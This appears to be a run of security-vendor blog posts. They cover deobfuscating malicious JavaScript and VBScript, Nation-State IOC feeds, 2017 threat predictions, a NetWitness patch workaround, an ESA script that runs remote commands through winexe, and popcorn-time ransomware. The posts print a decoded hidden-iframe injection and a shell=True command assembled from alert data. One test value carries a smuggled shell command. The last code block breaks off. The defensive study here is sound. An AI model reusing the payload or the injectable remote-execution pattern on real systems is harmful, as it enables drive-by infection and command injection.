

1. Edit sample.html to add the debugger; statement at the beginning of the script.

2. Load sample.html into Firefox using the browser's File menu.

3. Use Firebug to set a breakpoint on the eval(txt); line of the script.

4. Look at the contents of the variable "txt" by typing the console.log(txt) command in Firebug's Console tab.

5. Examine the deobfuscated script in the Console tab.






<html xmlns="" xml:lang="en" lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="#KEYWORDS#" />
<link rel="copyright" href="" />
<title>...Berlin with the appointed export lotus notes address book of...</title>

var arr = /* hex-encoded payload string, elided on the page */ "";

var table = new Array();
table['0'] = 0; table['1'] = 1; table['2'] = 2; table['3'] = 3;
table['4'] = 4; table['5'] = 5; table['6'] = 6; table['7'] = 7;
table['8'] = 8; table['9'] = 9; table['a'] = 10; table['b'] = 11;
table['c'] = 12; table['d'] = 13; table['e'] = 14; table['f'] = 15;

function markCounter(a) {
    var txt = ""; var c = 0;
    // every two hex characters of the payload become one character code
    while (c < a.length) {
        txt += String.fromCharCode(table[a[c]] * 16 + table[a[c + 1]]);
        c += 2;
    }
    eval(txt);   // runs the decoded payload; this is the line to break on
}






The decoded script contains a URL, which is probably malicious.





  1. Edit sample.html in Notepad++ to insert the "debugger;" statement at the beginning of its script.
  2. Open sample.html in Internet Explorer and activate the debugger in Developer Tools.
  3. Reload the script in Internet Explorer to activate the debugger.
  4. Set a breakpoint using the Internet Explorer debugger on the third instance of document.write.
  5. Run the script in the Internet Explorer debugger to deobfuscate its contents and reach the breakpoint.
  6. Copy the contents of the variable G82B54 to the clipboard and paste them into Notepad++.
  7. Examine the deobfuscated script in Notepad++ and then exit Internet Explorer and the text editor.





The URL is a malicious site.

G82B54 = "</textarea><iframe src=\"http://66.109.***.198/c76c1d2643c69857e1a677d2e0f23f8e/b1fd046f3c05b517d106b003853b1441?p=ftp\" width=1 height=1 style=\"border: 0px\"></iframe>"
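Both walkthroughs above run the sample in a browser and stop it just before eval() or document.write. The Python 3 script below is an added example, not code from the original post: it reproduces the first sample's markCounter() hex decoding statically, so the payload can be decoded and inspected without executing it, and then pulls out the 1x1 iframe source that both samples resolve to. The hex string and the iframe address are constructed stand-ins, since the page does not reproduce the original arr value.

```python
import re

# Added example, not code from the original post: a static port of the first
# sample's markCounter() decoder plus an iframe extractor, so the payload can
# be read without running it in a browser.

# Same nibble table the sample builds with table['0'] = 0 ... table['f'] = 15
TABLE = {ch: val for val, ch in enumerate("0123456789abcdef")}

def mark_counter(encoded):
    """Port of markCounter(): each pair of hex characters becomes one character.

    Only lowercase hex is accepted, as in the sample (its table has no
    uppercase keys); a trailing odd nibble is dropped rather than emitted
    as the "\\0" the JavaScript version would produce.
    """
    chars = []
    for i in range(0, len(encoded) - 1, 2):
        chars.append(chr(TABLE[encoded[i]] * 16 + TABLE[encoded[i + 1]]))
    return "".join(chars)

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def iframe_attributes(html):
    """One dict of lower-cased attribute names per <iframe> tag in html."""
    tags = []
    for tag in IFRAME_TAG.findall(html):
        attrs = {}
        for name, dq, sq, bare in ATTR.findall(tag):
            attrs[name.lower()] = dq or sq or bare
        tags.append(attrs)
    return tags

def hidden_iframe_sources(html):
    """src of every iframe declared 1x1 or smaller, the pattern in both samples."""
    found = []
    for attrs in iframe_attributes(html):
        width, height = attrs.get("width"), attrs.get("height")
        try:
            tiny = (width is not None and height is not None
                    and int(width) <= 1 and int(height) <= 1)
        except ValueError:
            tiny = False
        if tiny and attrs.get("src"):
            found.append(attrs["src"])
    return found

# Constructed stand-in for the elided `arr` string: the hex encoding of a
# hidden iframe like the one in the G82B54 variable (documentation address).
SAMPLE_HTML = ('</textarea><iframe src="http://198.51.100.7/landing?p=ftp" '
               'width=1 height=1 style="border: 0px"></iframe>')
SAMPLE_ARR = SAMPLE_HTML.encode("ascii").hex()

if __name__ == "__main__":
    decoded = mark_counter(SAMPLE_ARR)
    print(decoded)
    print(hidden_iframe_sources(decoded))
```

Feed the real arr string to mark_counter() in place of SAMPLE_ARR; the decoded text is then what the browser would have handed to eval() or document.write, and hidden_iframe_sources() lists the injected addresses to check against your feeds.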



Using the Cscript Interpreter


1. Right-click vbscript.vbs and select Edit with Notepad++. Add the following code at the beginning of the file, redefining the execute function so that, instead of executing its argument, it writes the argument to standard output:


Function execute(x)
    ' print the code that would have been executed instead of running it
    WScript.Echo x
End Function





2. Run the script with cscript, capturing its output, and then read out.txt:

cscript vbscript.vbs > out.txt



The 1390***.cn URL is a malicious site.

Michael Sconzo


Posted by Michael Sconzo Employee Dec 30, 2016

The FirstWatch team is constantly tracking various threats and threat actors. As part of their diligence they monitor 3rd parties for various bulletins and reports. US-Cert recently issued a report detailing an intrusion into a political organization believed to have originated from a Nation-State attacker. This attacker named 'GRIZZLY STEPPE' is the subject of a Joint Analysis Report (JAR) between DHS and DNI. The report can be found here:


Additionally, US-CERT has published an intrusion set that contains network indicators of compromise (IOCs) for the attack. RSA has added these indicators into the NetWitness Live platform (via Feeds); the indicators can be located in NetWitness with the following custom pivot:

threat.source = "third party publicized iocs" && threat.category = "us-cert"


That said, some of the indicators as published are problematic, as they contain legitimate IPs that we believe to be benign triggers. We've identified the following IPs (at a minimum) as potential false positive indicators:



.Edu OWA Server:



Hits to any GRIZZLY STEPPE indicators should warrant additional investigation but hits to the above IP addresses should include the expectation of being false positives. None of these indicators have been removed from the feed since we don't want to alter 3rd party information and cause potentially useful context to be absent. 

I am keenly aware that many of us are carrying lots of baggage due to the myriad of 2016 happenings that threatened free and open societies, but I need you to shake it off and consider the following:


Life is increasingly data dependent, and the Internet is increasingly at risk

First off, it’s a pretty obvious assumption, but life (not just world commerce) is increasingly data dependent. Just how many commercials have you seen where a hipster parent is clicking on their smartphone app to access their home automation setup? Ruling out your need to lock the car doors while away on beach vacation, our daily data addiction is probably better exhibited through our appetite for texting, social media, streaming music, Google, and the many other conveniences of taking the Internet with you. Like it or not, we have rapidly become a connected culture. And while our data reliance seems like a logical progression of technology within our society, so few are aware of the precarious balance. In recent years, the Internet has become a huge enabler of really every market sector… but it’s also become an increasingly more volatile place to operate.


(source: Deloitte[1])


The increasing volatility of the Internet was clearly demonstrated during the second half of 2016 with a wave of critical services outages (e.g., Dyn[2]) and the continued rise of malware. We’ll discuss the Internet of Things (IoT) a bit further on in this post, and for now let’s focus on crimeware, where actors ”saturated both the rural and urban U.S. populace with ransomware, and constantly improved their tactics, execution and business model to evade detection by current solutions”[3]. A number of FirstWatch investigations (i.e., previous analysis of Cerber and Locky campaigns) also provide evidence and have documented a growing maturity in the crimeware operating model, specifically detailing best practices ranging from innovative attack vectors and diversified revenue streams to customer service for ‘victim assistance’. These are all part of the recipe that allowed Ransomware to see unprecedented revenues in 2016.


Maybe that’s not enough evidence though… So let’s consider ‘methbot’, a Russian botnet responsible for exploiting online advertising. In this case, actors gamed the Real Time Bidding process (central to how online exchanges auction and place advertising) by forging nearly 600,000 IP address registrations associated with major US internet service providers (ISPs) and creating “more than 250,000 fake web pages with counterfeit inventory from over 6,000 top-line publishers, including The Economist, The Huffington Post, Vogue, ESPN, Fox News and CBS Sports. Methbot generated between 200 and 300 million bogus video ad impressions per day” to fraudulently earn revenue estimated at more than $1 billion[4]. That means that late 2016 crimeware initiatives earned more than the projected GDP for 14 countries[5].


2017 will be the year of crimeware from Eastern Ukraine

So maybe 2016 was just a bad year; how will 2017 see the unprecedented further escalation of crimeware? The answer lies more in the ‘where’… and the answer is Eastern Ukraine. Since the initial invasion in early 2014, Crimea and Eastern Ukraine have been largely under the control of Russian military and Intelligence organizations, and it’s no coincidence that the area has become a hotbed for cyber activity.



Ukraine map as of 18 December 2016[6] (source: BleepingComputer)


Consider the context of ongoing BlackEnergy attacks against Ukrainian power infrastructure and banking[7], which are increasingly suspect of Russian state involvement. It has also been widely reported that Russian GRU (‘Glavnoye razvedyvatel'noye upravleniye’, which translates to Main Intelligence Directorate) was responsible for deploying malware to exploit and gain intelligence from an app commonly used by Ukrainian military forces[8]. Clearly the Russian state is engaged in an active cyber campaign in the region.


But is the increase in crimeware related? During our investigations of summer ransomware attacks, we did note Cerber domains registered to Ukrainian citizens and even to the street address of the Holy Trinity Cathedral in Donetsk; additionally, SKS-Lugan (operating out of Alchevs’k) continues to rise as a notorious cyber-crime-friendly ISP[9]. Both Donetsk and Alchevs’k fall within pro-Russian separatist areas of control in the map above. So… are crimeware actors simply taking advantage of the near bulletproof operating environment that is Eastern Ukraine? Or has Putin connected the dots and begun to directly leverage crimeware to fund his ‘operations’? While it remains unclear, somehow that second idea rings more true each day. Either way, it is likely that we will see continued heightened cyber (and specifically crimeware) operations out of the region in 2017.


My toaster and the Internet of Things is ready to ruin everyone’s day

While the situation in Eastern Ukraine is pretty bleak, and its cyber campaigns are certainly going to keep Security Industry folks busy, the real problem is that, as if this wasn’t bleak enough, now we have to talk about the Internet of Things (IoT) and why you should be very afraid… First and foremost, let’s all agree the IoT is comprised of all the ‘dumb’ networked devices around our homes and offices (e.g., routers, thermostats, sprinklers, refrigerators, Echoes, etc.). Unfortunately, we (society) may have lost our heads a bit in the frenzy to field all these flavors of connected devices; apparently security wasn’t a calculated concern.


As evidence of this, 2016 witnessed the first major IoT exploit with the simple brilliance of Mirai, its botnet armies, and historically massive distributed denial of service (DDoS) capabilities. The fact that these sleeper botnets exist is disturbing enough, but perhaps even more significant is that Mirai broke the silence about the ‘middle-school-quality’ security of large swathes of the Internet of Things. Despite a frenzy of OEM patching and rapid growth in the emerging IoT security market, our devices are going to be a welcoming attack surface for Mirai and other IoT related campaigns for years to come.



650Gbps DDoS Attack from Leet Botnet on 21 December 2016[10] (source: Imperva)


If you’re still not making the connection, the vulnerabilities in the IoT effectively mean that everything from our privacy to critical infrastructure[11] to personal safety[12] might be in jeopardy. Now imagine what happens when opportunistic crimeware actors leverage IoT vulnerabilities for a myriad of nefarious purposes… car and TV ransomware[13], over-driven heating system explosions, privacy leaks from Amazon Echoes[14], public transportation outages[15]… the list of the possible goes on and on. Scared yet?


The Bottom Line

Thanks for the lessons in humility, 2016. It’s clear that with the plethora of IoT vulnerabilities and the potential for their exploit from bulletproof operating environments (i.e., Eastern Ukraine), 2017 will usher in a new level of threat to our (society’s) ever-increasing data habit. Now is the time to start shoring up the levees.




















This might help illustrate all the components and levers in place to make Malware/Spectrum function in RSA NetWitness suite.  Some of this is obvious, some of it is not.


Hope it helps anyone that is implementing or thinking of implementing the Malware component for packet traffic.


[Updated] - added legend to call out what is RSA Content and what is opportunities for filtering and customization


The Security Analytics/NetWitness Suite Patch releases can be installed on Service Packs, but not on major releases. For example, can be installed on but not on . This also means that the patch release upgrade packages only contain the rpms that are needed to upgrade from the nearest service packs.

If the latest patch was not applied to all appliances at the same time, you need to use a workaround to update them.



  • SA server, Log Collector, and Concentrator have been built from the 10.6.0 OVA.
  • Connection to Live Update Repository was turned off.
  • SA Server and Log Collector were upgraded to 10.6.1 by using the split zip packages (7 zip files). But the Concentrator was left as


Case 1

The 10.6.1 upgrade package was removed from the local repo (SA UI -> Systems -> Updates -> Settings -> Manage Repository. Select and remove 10.6.1).

Now the packages (5 zip files) were uploaded.


SA Server and LC can be upgraded to But Concentrator only sees as a possible upgrade.



1. Load 10.6.1 so that there will be both 10.6.1 and in the local repo.

2. Log into the Concentrator console.

3. Copy the /etc/yum.repos.d/RSASoftware.repo file and create the temp.repo file under the same location. In the temp.repo file, change the last section of the baseurl with the actual release number to 10.6.1 (SA server's local repo folder.)



4. From a command prompt, run "yum clean all", followed by "yum check-update". At this point, you should be able to see the SA rpms returned.

6. Run "yum update -y".

7. After a successful upgrade, delete the temp.repo file.



Case 2

From the end of Case 1 --- After upgrading the SA server to, add a new ESA.



The new ESA was provisioned successfully.
The only update option available to the ESA is but only sees as a possible upgrade.


The same workaround above will work for ESA.


This scenario came from Michael McGillick originally a couple of months ago. I thought the above information is worth sharing.

Thank you Melinda Zelenkov for reviewing this post.

A colleague here at RSA posed an interesting problem so I thought I would share with you how I solved it.


Imagine the following scenario. A Windows machine has visited a potentially suspicious website. This is detected by an ESA rule and an incident is created. Normal SOC procedures say that when such an incident happens the ECAT Agent should be installed on the Windows machine so that further analysis can take place. It is a busy day in the SOC and unfortunately there is a long time gap before the agent is actually installed. Can this actually be automated?


The answer is yes, and here is how.


First of all, I have a CentOS 6 server where I will run the commands from. This is to avoid installing any extra packages on the ESA Server that could potentially cause problems.


On the CentOS 6 server I have installed the openvas-smb package. This provides the winexe Linux command.

This is a tool that allows you to run psexec-type commands from a Linux machine.


[root@centos6 ~]# yum install wmi
Loaded plugins: fastestmirror, refresh-packagekit
Setting up Install Process
Loading mirror speeds from cached hostfile
* atomic:
* base:
* centosplus:
* contrib:
* epel:
* extras:
* updates:
Package wmi is obsoleted by openvas-smb, trying to install instead
Resolving Dependencies
--> Running transaction check
---> Package openvas-smb.x86_64 will be installed
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: atomic-gnutls3-gnutls for package:
--> Processing Dependency: atomic-glib2-glib2 for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Processing Dependency: for package:
--> Running transaction check
---> Package atomic-glib2-glib2.x86_64 will be installed
---> Package atomic-gnutls3-gnutls.x86_64 will be installed
--> Processing Dependency: for package:
--> Processing Dependency: for package:
---> Package heimdal-libs.x86_64 0:1.6.0-0.9.20140621gita5adc06.el6 will be installed
--> Running transaction check
---> Package nettle.x86_64 will be installed
--> Finished Dependency Resolution

Dependencies Resolved

Package Arch Version Repository Size
openvas-smb x86_64 atomic 3.3 M
Installing for dependencies:
atomic-glib2-glib2 x86_64 atomic 2.2 M
atomic-gnutls3-gnutls x86_64 atomic 610 k
heimdal-libs x86_64 1.6.0-0.9.20140621gita5adc06.el6 epel 1.0 M
nettle x86_64 atomic 307 k

Transaction Summary
Install 5 Package(s)

Total download size: 7.4 M
Installed size: 28 M
Is this ok [y/N]: y
Downloading Packages:
(1/5): | 2.2 MB 00:02
(2/5): | 610 kB 00:00
(3/5): heimdal-libs-1.6.0-0.9.20140621gita5adc06.el6.x86_64.rpm | 1.0 MB 00:01
(4/5): | 307 kB 00:00
(5/5): | 3.3 MB 00:01
Total 1.1 MB/s | 7.4 MB 00:06
Running rpm_check_debug
Running Transaction Test
Transaction Test Succeeded
Running Transaction
Warning: RPMDB altered outside of yum.
Installing : 1/5
Installing : heimdal-libs-1.6.0-0.9.20140621gita5adc06.el6.x86_64 2/5
Installing : 3/5
Installing : 4/5
Installing : 5/5
Verifying : 1/5
Verifying : heimdal-libs-1.6.0-0.9.20140621gita5adc06.el6.x86_64 2/5
Verifying : 3/5
Verifying : 4/5
Verifying : 5/5


Dependency Installed:
atomic-glib2-glib2.x86_64 atomic-gnutls3-gnutls.x86_64 heimdal-libs.x86_64 0:1.6.0-0.9.20140621gita5adc06.el6



After installing the package I then created a file called credentials.cfg containing the account I would use to run the commands on my windows target machine.




I was then able to run command from my centos 6 server to a windows machine as follows:


[root@centos6 ~]# winexe -A credentials.cfg // 'cmd.exe /c echo "hello"'
You have mail in /var/spool/mail/root
[root@centos6 ~]# winexe -A credentials.cfg // 'hostname'


This now gives us the capability of running commands from our CentOS 6 machine on a Windows machine.


The next part of the puzzle was to allow the ESA Server to be able to connect to our Centos 6 Server to be able to run commands. We set up passwordless SSH keys to do this. The important thing here is that when scripts run on the ESA Server, they are run under the user "notification" so we have to set this up as follows:


SSH onto the ESA Server as root, then type sudo su notification

This switches us to the user notification.


[notification@rsaesa tmp]$ whoami
[notification@rsaesa tmp]$ cd ~
[notification@rsaesa .ssh]$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/notification/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/notification/.ssh/id_rsa.
Your public key has been saved in /home/notification/.ssh/
The key fingerprint is:
d9:ed:61:48:db:c1:aa:75:d5:b7:64:3f:ac:1c:c4:2b notification@rsaesa
The key's randomart image is:
+--[ RSA 2048]----+
| |
| .. . |
| . oo.oo|
| + *.o= +|
| S *E*o +.|
| o +o.o .|
| . .o |
| |
| |
[notification@rsaesa .ssh]$ ssh-copy-id root@centos6.waugh.local
root@centos6.waugh.local's password:
Now try logging into the machine, with "ssh 'root@centos6.waugh.local'", and check in:


to make sure we haven't added extra keys that you weren't expecting.

[notification@rsaesa .ssh]$ ssh root@centos6.waugh.local "winexe -A credentials.cfg // 'hostname'"
[notification@rsaesa .ssh]$ exit


Here we can see that we can run a command on the ESA Server, which will run a command on our Centos 6 Server which will then actually run a command on our target windows machine.


We now define our ESA Rule. My ESA Rule fires whenever a suspicious IP is detected.



My ESA Script is as follows (Attached as file ESAScript to import into the Global Notifications Page). Note this is python so indentations matter. Please import the file into your system to see the format of the script.


#!/usr/bin/env python
from smtplib import SMTP
import subprocess
import datetime
import json
import sys

def dispatch(alert):
    """
    The default dispatch just prints the 'last' alert to /tmp/esa_alert.json. Alert details
    are available in the Python hash passed to this method e.g. alert['id'], alert['severity'],
    alert['module_name'], alert['events'][0], etc.
    These can be used to implement the external integration required.
    """
    with open("/tmp/esa_alert.json", mode='w') as alert_file:
        alert_file.write(json.dumps(alert, indent=True))

def read():
    # Define our metakey tuples
    # Each tuple is ["metakey", "meta key description", "value"]
    metakeys = [ ["device_type", "Device Type: ", ""],
                 ["device_ip", "Device IP: ", ""],
                 ["device_class", "Device Class: ", ""],
                 ["ip_src", "Source IP: ", ""],
                 ["ip_dst", "Dest IP: ", ""],
                 ["ip_srcport", "Source Port: ", ""],
                 ["ip_dstport", "Dest Port: ", ""],
                 ["ec_activity", "Activity: ", ""],
                 ["ec_subject", "Subject: ", ""],
                 ["ec_theme", "Theme: ", ""],
                 ["event_description", "Description: ", ""],
                 ["event_cat_name", "Category: ", ""],
                 ["msg_id", "Message ID: ", ""],
                 ["event_source_id", "Concentrator: ", ""] ]

    # Keys we want in our Subject
    subj_metakeys = [ ["device_type", "Device Type: ", ""],
                      ["msg_id", "Message ID: ", ""] ]

    # Environment settings (blank on the page; fill in for your deployment)
    sa_server = ''
    brokerid = '6'
    smtp_server = ''
    smtp_port = '25'
    smtp_user = ''
    smtp_pass = ''
    from_addr = "RSA Security Analytics <>"
    to_addr = ['']

    # Get data from JSON
    esa_alert = json.loads(open('/tmp/esa_alert.json').read())
    # Extract Variables (Add as required)
    try:
        module_name = esa_alert["module_name"]
    except KeyError:
        module_name = "null"
    try:
        sessionid = str(esa_alert["events"][0]["sessionid"])
    except KeyError:
        sessionid = "null"
    try:
        ip_src = str(esa_alert["events"][0]["ip_src"])
    except KeyError:
        ip_src = "null"

    # Extract Values for each of our Variables
    for tuples in metakeys:
        try:
            tuples[2] = str(esa_alert["events"][0][tuples[0]])
        except KeyError:
            tuples[2] = "null"

    # Extract Our Subject Variables
    for tuples in subj_metakeys:
        try:
            tuples[2] = str(esa_alert["events"][0][tuples[0]])
        except KeyError:
            tuples[2] = "null"

    try:
        event_source_id = esa_alert["events"][0]["event_source_id"]
    except KeyError:
        event_source_id = "null"

    # Work out Concentrator ID depending on Event Source
    # (the first two prefixes and the concentrator IDs were blank on the page;
    # replace the placeholders for your environment; brokerid is the fallback)
    concid = brokerid
    if event_source_id.startswith("<prefix-1>"):
        concid = "<concentrator-1 id>"
    elif event_source_id.startswith("<prefix-2>"):
        concid = "<concentrator-2 id>"
    elif event_source_id.startswith("CONC3"):
        concid = "<concentrator-3 id>"
    elif event_source_id.startswith("CONC4"):
        concid = "<concentrator-4 id>"

    # Sends Email
    smtp = SMTP()
    smtp.connect(smtp_server, smtp_port)

    # Runs command
    mycommand = "ssh root@centos6.waugh.local \"winexe -A credentials.cfg //" + ip_src + " 'hostname'\""
    myresult = ""

    # Runs a System Command
    p = subprocess.Popen(mycommand, shell=True, stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT, universal_newlines=True)
    for line in p.stdout.readlines():
        myresult = myresult + line   # readlines() keeps the trailing newline
    retval = p.wait()

    date = datetime.datetime.now().strftime("%d/%m/%Y %H:%M")
    subj = module_name + " :: " + date
    for subj_meta in subj_metakeys:
        subj += " :: " + subj_meta[2]

    header = "Use the Investigation tab within Security Analytics to view more details related to this alert.\n\n"
    header += ""     # investigation URL prefix (blank on the page)
    header += str(concid)
    header += "/navigate/event/DETAILS/"
    header += str(sessionid)
    header += "\n\n"

    message_text = "Alert Name: \t\t%s\n" % (module_name)
    message_text += "Date/Time: \t\t%s\n" % (date)
    message_text += "Command: \t\t%s\n" % (mycommand)
    message_text += "Return Value: \t\t%s\n" % (retval)
    message_text += "Result: \t\t%s\n" % (myresult)

    for meta in metakeys:
        message_text += meta[1] + "\t\t%s\n" % (meta[2])

    body_text = header + message_text
    msg = "From: %s\nTo: %s\nSubject: %s\nDate: %s\n\n%s\n" % (from_addr, ", ".join(to_addr), subj, date, body_text)

    smtp.sendmail(from_addr, to_addr, msg)
    smtp.quit()

if __name__ == "__main__":
    # ESA passes the alert as a JSON string argument: write it out, then build and send the email
    dispatch(json.loads(sys.argv[1]))
    read()
    sys.exit(0)


You can import the rule as follows:


After this, when the ESA Rule is triggered, the command will be run and you will also get an email of the results of the command.


Sample Email Body:




What we have achieved here is that the hostname command runs on the machine when the ESA Rule triggers.


If you wanted to install ECAT, for example, we need to be a bit more inventive.


On our centos command server we use the following file 



#!/bin/bash
# $1 = IP address of the target Windows machine
# Mount the remote machine to copy over ECAT Agent
mount -t cifs //$1/c$ /mnt/temp-mount -o credentials=~/credentials.cfg
# Mount our ECAT source directory where the Agent.exe package lives
# (the file server name before /Packages/ECAT was blank on the page)
mount -t cifs //$/Packages/ECAT /mnt/ecat -o credentials=~/credentials.cfg
cp -rf /mnt/ecat/ecatagent43proxy.exe /mnt/temp-mount/ecatagent43proxy.exe
winexe -A credentials.cfg //$1 'cmd.exe /c "c:\ecatagent43proxy.exe"'
rm /mnt/temp-mount/ecatagent43proxy.exe
umount /mnt/temp-mount


To install ECAT on a remote machine we would run ./ with the target's IP address as the argument.


We now incorporate this into our ECATInstall Script, by replacing the existing command line with:

# Runs command
mycommand = "ssh root@centos6.waugh.local \"./ " + ip_src + "\""


When we ping a suspicious IP, ECAT then gets installed on the Windows machine.
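One caveat on the script above that is worth handling before it goes into production: mycommand is assembled by string concatenation from ip_src and handed to subprocess.Popen with shell=True, so any shell metacharacters that end up in that meta value would run as the notification user on the ESA. The Python 3 helper below is an added example, not the post's script: it accepts only a literal IP address and builds an argument list for ssh, quoting the remote winexe command for the jump host's shell. The jump host, credentials file and commands are the post's; the private-address restriction is an assumption that the targets are internal workstations.

```python
import ipaddress
import shlex
import subprocess

# Added example, not the post's ESA script. Host, credentials file and the
# winexe commands are taken from the post; the private-address check is an
# assumption (targets are internal Windows workstations).
JUMP_HOST = "root@centos6.waugh.local"
CREDENTIALS = "credentials.cfg"

def safe_ip_or_none(value, require_private=True):
    """Return the canonical text of value if it is a plain IPv4/IPv6 address
    (and, by default, a private one); otherwise None."""
    try:
        addr = ipaddress.ip_address(str(value).strip())
    except ValueError:            # anything that is not just an address
        return None
    if require_private and not addr.is_private:
        return None
    return str(addr)

def build_winexe_command(ip_src, remote_cmd="hostname"):
    """Argument list to run on the ESA instead of a shell string.

    Raises ValueError when ip_src is not an acceptable address, so a
    tampered meta value never reaches a shell.
    """
    ip = safe_ip_or_none(ip_src)
    if ip is None:
        raise ValueError("refusing to run against non-IP target: %r" % (ip_src,))
    # The winexe line is executed by the jump host's shell, so quote its parts.
    remote = "winexe -A %s //%s %s" % (shlex.quote(CREDENTIALS), ip, shlex.quote(remote_cmd))
    return ["ssh", "-o", "BatchMode=yes", JUMP_HOST, remote]

def run_argv(argv, timeout=120):
    """Run argv without a local shell; return (return code, combined output).
    A hung ssh session must not block the notification runner, hence the timeout."""
    try:
        done = subprocess.run(argv, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                              universal_newlines=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return (None, "timed out after %d seconds" % timeout)
    return (done.returncode, done.stdout)

if __name__ == "__main__":
    # Constructed alert fragments: a normal event and one with a tampered ip_src
    for event in ({"ip_src": "10.20.30.40"}, {"ip_src": "10.20.30.40; id"}):
        try:
            print(build_winexe_command(event["ip_src"]))
        except ValueError as err:
            print("blocked:", err)
```

In the script's read() this replaces the mycommand/Popen block: call build_winexe_command(ip_src) (or pass the ECAT install command as remote_cmd), run the result with run_argv(), and put the returned code and output into the email; a ValueError should be reported in the email body rather than swallowed, since it means the alert carried something other than an address.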

This is a helper report for the lateral movement report pack and alerting capability that was released a while back.


This will query for the eventID's that are required to trip the alerting and reporting that were released, to make it easier to understand if the required data is available for the content that was published.



1 report

8 rules


Imports into Threats - Windows Lateral Movement


Kevin Stear

Popcorn-Time Ransomware

Posted by Kevin Stear Employee Dec 16, 2016

During the week of Dec 12th, FirstWatch took a look at popcorn-time ransomware and its novel approach for a 'viral' attack vector...


Popcorn-time executables function much like other typical ransomware, encrypting important files on a victim's machine and demanding a 1 BTC payment for a decryption key.  Where popcorn-time deviates from typical ransomware campaigns is its attempt to exploit the very worst of human nature...  By that I mean, victims who forward a tor2web proxy link (e.g., https://3hnuhydu4pd247qb[.]onion, aka a popcorn-time download site) to 'friends and family' can receive a free decryption key if two of their 'referrals' are infected and pay the 1 BTC ransom.  It's like a bad chain letter; yet, this approach gives popcorn-time a viral component to its attack vector that significantly extends both the longevity and fiduciary return of its campaign.


As part of the effort to evaluate the ransomware's operational infrastructure, we developed a basic yara signature (see figure 1) for popcorn-time and pulled hashes via VirusTotal retrohunt.  


Figure 1: popcorn-time yara signature



This signature (admittedly somewhat basic) successfully returns popcorn-time VirusTotal submissions from November and early December, which were observed with typical network callbacks to downloader and malvertising domains.  For example, md5 383c368ae33c530da36ffae0bceec80e was active at the end of November and observed with DNS lookups and a TCP connection out to popcorn-time-free[.]net.  It is hypothesized that many of the popcorn-time related domains are 302 redirecting traffic to tor2web download sites for victim infection.  The Maltego snapshot below is representative of the campaign's IP and Domain infrastructure (with enrichment from pDNS, certificate and domain registrations, open source intelligence, etc.) as it relates to these earlier VirusTotal (VT) submissions.


Figure 2: popcorn-time infrastructure



During the analysis of this segment of operational infrastructure, we gleaned approximately 300 indicators of compromise (IOCs) that have been pushed into Live under the FirstWatch C2_IPs and C2_DOMAINs (threat.source = 'rsa-firstwatch', threat.category = 'crimeware', and threat.desc = 'popcorn-time').  Although not pictured above, it's worth mentioning that this infrastructure has some ties to past Conficker and clickjacker campaigns (e.g., JS/Faceliker deliveries from 1e100[.]net).


In somewhat stark contrast, evidence of popcorn-time's viral component begins to appear in VT submissions during early-to-mid December, where related hashes were observed with absolutely no network connections (e.g., ).  It is believed that this second wave of submissions is representative of 'referral' victims, who may have clicked on a tor2web link emailed to them by their once favorite, now dirtbag, cousin.


An important note on tor2web proxies: popcorn-time joins recent Cerber and EK campaigns (e.g., Cerber) that increasingly leverage Tor services, an obvious step towards obfuscation from security researchers and conventional network defense approaches.  While FirstWatch is aggressively researching capabilities to better mitigate the evolving use of Tor infrastructure in crimeware, the interim recommendation is to block all traffic to and from .TOR and .ONION domains.
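As an added example (not FirstWatch code), the matcher below applies the two checks this post leaves you with, a hit on the popcorn-time feed domains and any query for a .onion name or a tor2web-gateway form of one, to a handful of constructed DNS query log lines. The two domains are the ones named in the post; the log format, timestamps and client addresses are made up.

```python
import re

# Added example, not FirstWatch content: feed-domain and Tor/.onion matching
# over constructed DNS log lines. The two domains are from the post; the log
# format and addresses are invented for the example.

def refang(indicator):
    """Turn a defanged indicator such as popcorn-time-free[.]net back into a hostname."""
    return (indicator.strip().lower()
            .replace("[.]", ".").replace("(.)", ".").rstrip("."))

# Stand-in for the feed entries (threat.desc = 'popcorn-time')
POPCORN_DOMAINS = {refang(d) for d in ("popcorn-time-free[.]net",
                                        "3hnuhydu4pd247qb[.]onion")}

# A 16-character (v2) or 56-character (v3) base32 label followed by .onion.
# A tor2web gateway exposes the same name with its own suffix appended,
# e.g. <label>.onion.<gateway-tld>, so the pattern allows a trailing dot.
ONION_LABEL = re.compile(r"(?:^|\.)[a-z2-7]{16}(?:[a-z2-7]{40})?\.onion(?:\.|$)")

def classify_host(host):
    """'popcorn-time-indicator', 'onion', 'tor2web-gateway' or None."""
    h = refang(host)
    if h in POPCORN_DOMAINS or any(h.endswith("." + d) for d in POPCORN_DOMAINS):
        return "popcorn-time-indicator"
    if ONION_LABEL.search(h):
        return "onion" if h.endswith(".onion") else "tor2web-gateway"
    return None

# dnsmasq-style line: <timestamp> <client> query[<type>] <name>
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\[(?P<qtype>\w+)\]\s+(?P<qname>\S+)")

def scan_dns_log(lines):
    """Return (client, qname, verdict) for each line whose query name is flagged."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        verdict = classify_host(m.group("qname"))
        if verdict:
            hits.append((m.group("client"), m.group("qname"), verdict))
    return hits

# Constructed sample log, not real traffic
SAMPLE_LOG = [
    "2016-12-14T10:01:02Z 10.1.2.3 query[A] www.example.com",
    "2016-12-14T10:01:05Z 10.1.2.3 query[A] popcorn-time-free.net",
    "2016-12-14T10:02:11Z 10.1.2.9 query[A] 3hnuhydu4pd247qb.onion.to",
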